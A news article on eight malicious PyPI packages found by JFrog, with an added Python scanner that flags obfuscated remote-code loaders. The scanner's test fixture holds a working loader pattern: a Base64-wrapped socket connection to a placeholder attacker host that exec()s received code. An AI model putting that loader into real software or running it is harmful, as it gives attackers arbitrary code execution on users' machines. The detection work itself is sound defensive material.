Software downloaded approximately 30,000 times from the open source PyPI repository contained malicious code that surreptitiously stole credit card data and login credentials and injected malicious code into infected machines, researchers said Thursday.
In a post, researchers Andrey Polkovnichenko, Omer Kaspi, and Shachar Menashe of DevOps software provider JFrog said they recently found eight packages in PyPI that carried out a range of malicious activities. Based on data from https://pepy.tech, a site that provides download statistics for Python packages, the researchers estimate that the malicious packages were downloaded approximately 30,000 times.
The discovery is the latest in a long series of attacks in recent years that abuse the trust placed in open source repositories, which millions of software developers rely on daily. Despite their crucial role, repositories often lack robust security and verification controls, a weakness that can lead to serious supply chain attacks when developers unknowingly infect themselves or insert malicious code into the software they publish.
“The continued discovery of malware packages in popular repositories like PyPI is an alarming trend that can lead to widespread supply chain attacks,” JFrog CTO Asaf Karas wrote in an email. “The ability for attackers to use simple obfuscation techniques to introduce malware means developers need to be concerned and vigilant. This is a systemic threat, and it needs to be actively addressed on multiple levels, both by software repository maintainers and developers.”
The researchers thanked Dustin Ingram, maintainer of PyPI, “for responding promptly and removing the malicious packages” when notified. Ingram did not immediately respond to a request for comment.
Different packages in Thursday’s batch carried out different types of nefarious activity. Six of them had three payloads: one for collecting authentication cookies for Discord accounts, a second for extracting passwords or payment card data stored by browsers, and a third for collecting information about the infected PC, such as its IP address, computer name, and username.
The remaining two packages contained malware that attempted to connect to an attacker-designated IP address on TCP port 9009 and then execute whatever Python code it received from the socket. It is not clear what the IP address was or whether any malware was hosted on it.
As is the case with most amateur Python malware, the packages used only simple obfuscation such as Base64 encoding. Here’s a breakdown of the packages:
| Package name | Maintainer | Payload |
|---|---|---|
| noblesse | xin1111 | Discord token stealer, credit card stealer (Windows-based) |
| genesisbot | xin1111 | Identical to noblesse |
| aryi | xin1111 | Identical to noblesse |
| suffer | suffer | Identical to noblesse, obfuscated by PyArmor |
| noblesse2 | suffer | Identical to noblesse |
| noblessev2 | suffer | Identical to noblesse |
| pytagora | leonora123 | Remote code injection |
| pytagora2 | leonora123 | Identical to pytagora |
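The two behaviours the article describes, a Base64-wrapped stage and a socket that feeds received bytes straight into `exec()`, are cheap to triage statically before a package is ever installed. The following is an added example, not JFrog's tooling or code from any of the packages above: it parses a package's install-time source with Python's `ast` module, flags `exec`/`eval`-style calls, `connect()` calls with literal endpoints and Base64 decoders, and when a decoder is applied to a string literal it decodes that literal and re-scans the result so a one-layer obfuscation does not hide the network stage. The sample `setup.py` is constructed here, and the host name `attacker.invalid` is a placeholder rather than the address the real packages used.

```python
"""Static triage for a PyPI package's install-time code (added example, not JFrog's tool)."""
import ast
import base64
import binascii

# Constructed sample modelled on the behaviour described above: a Base64-wrapped stage
# that connects to an attacker host on TCP 9009 and exec()s whatever it receives.
# The host name is a placeholder, not the address used by the real packages.
INNER_STAGE = (
    "import socket\n"
    "s = socket.socket()\n"
    "s.connect(('attacker.invalid', 9009))\n"
    "exec(s.recv(4096).decode())\n"
)
SAMPLE_SETUP_PY = (
    "import base64\n"
    "from setuptools import setup\n"
    f"exec(base64.b64decode({base64.b64encode(INNER_STAGE.encode())!r}))\n"
    "setup(name='pytagora-lookalike', version='0.0.1')\n"
)

DYNAMIC_CODE = {"exec", "eval", "compile", "__import__"}
DECODERS = {"b64decode", "b32decode", "b16decode", "a85decode", "b85decode"}


def _call_name(node):
    """Return a dotted name for a Call's callee ('exec', 'base64.b64decode', 's.connect')."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        parts = [func.attr]
        value = func.value
        while isinstance(value, ast.Attribute):
            parts.append(value.attr)
            value = value.value
        if isinstance(value, ast.Name):
            parts.append(value.id)
        return ".".join(reversed(parts))
    return None


def _decode_literal(node):
    """If node is <x>.b64decode(<str/bytes literal>), return the decoded text, else None."""
    arg = node.args[0] if node.args else None
    if not isinstance(arg, ast.Constant) or not isinstance(arg.value, (str, bytes)):
        return None
    try:
        return base64.b64decode(arg.value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def scan_source(source, depth=0, max_depth=3):
    """Walk the AST and return (finding, line, depth) tuples.

    depth > 0 means the finding came from a Base64 literal that was decoded and
    re-scanned, which is how a single obfuscation layer is seen through.
    """
    findings = []
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return [("unparseable-source", 0, depth)]
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        if name is None:
            continue
        last = name.rsplit(".", 1)[-1]
        if last in DYNAMIC_CODE:
            findings.append((f"dynamic-code:{last}", node.lineno, depth))
        elif last == "connect":
            # Record the endpoint when it is a literal (host, port) tuple.
            endpoint = ""
            if node.args and isinstance(node.args[0], ast.Tuple):
                endpoint = ":".join(str(getattr(e, "value", "?")) for e in node.args[0].elts)
            findings.append((f"network-connect:{endpoint}", node.lineno, depth))
        elif last in DECODERS:
            findings.append((f"decoder:{last}", node.lineno, depth))
            # Only Base64 literals are decoded and re-scanned in this example.
            inner = _decode_literal(node) if last == "b64decode" else None
            if inner is not None and depth < max_depth:
                findings.extend(scan_source(inner, depth + 1, max_depth))
    return findings


def verdict(findings):
    """Collapse findings into a triage label; network access plus dynamic code is the
    remote-code-loader pattern the article describes."""
    kinds = {f[0].split(":", 1)[0] for f in findings}
    if "dynamic-code" in kinds and "network-connect" in kinds:
        return "likely-remote-code-loader"
    if "dynamic-code" in kinds and "decoder" in kinds:
        return "obfuscated-dynamic-code"
    return "review" if kinds else "clean"


if __name__ == "__main__":
    results = scan_source(SAMPLE_SETUP_PY)
    for finding, line, depth in results:
        print(f"{'  ' * depth}line {line}: {finding}")
    print("verdict:", verdict(results))
```

Run against the constructed `setup.py`, the scanner reports the outer `exec` and `b64decode` at depth 0 and then, inside the decoded stage, the `connect(('attacker.invalid', 9009))` call and the second `exec`, giving the verdict `likely-remote-code-loader`. The obvious caveat: this sees through literal Base64 only. A payload built at runtime (string concatenation, `bytes.fromhex`, or a commercial packer such as the PyArmor layer on `suffer`) will still register as dynamic code plus a decoder, which is reason enough to open the archive by hand, but the endpoint will not be recovered statically.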
Karas told me that the first six packages can infect the developer’s computer but cannot taint code the developer writes with malware.
“For the pytagora and pytagora2 packages, which allow code to be executed on the machine where they were installed, this would be possible,” he said in a direct message. “After infecting the development machine, they would allow code to be executed, and then a payload could be downloaded by the attacker which would modify software projects under development. However, we have no evidence that this was actually done.”
Beware of “Frankenstein” malware
The central role repositories play in software development makes them an ideal vector for supply chain attacks, which increasingly use techniques known as typosquatting or dependency confusion.
Repository supply chain attacks date back to at least 2016, when a student uploaded malicious packages to PyPI. Over a period of several months, his impostor code was executed more than 45,000 times on more than 17,000 separate domains, and more than half the time his code was granted all-powerful administrative rights. Since then, supply chain attacks have become commonplace for RubyGems and npm as well. Over the past few months, hackers have devised a new type of supply chain attack that works by uploading malicious packages to public code repositories and giving them the same name as a package stored in the internal repository of a popular software maker. These so-called dependency confusion attacks have already ensnared Apple, Microsoft, and 33 other companies.
JFrog researchers said that, given the current state of repository security, the internet is likely to see more such attacks in the future.
“Almost all of the code snippets analyzed in this research were based on known public tools, with only a few parameters changed,” they wrote. “Obfuscation was also based on public obfuscators. We expect to see more of this ‘Frankenstein’ malware assembled from different attack tools (with changed exfiltration settings).”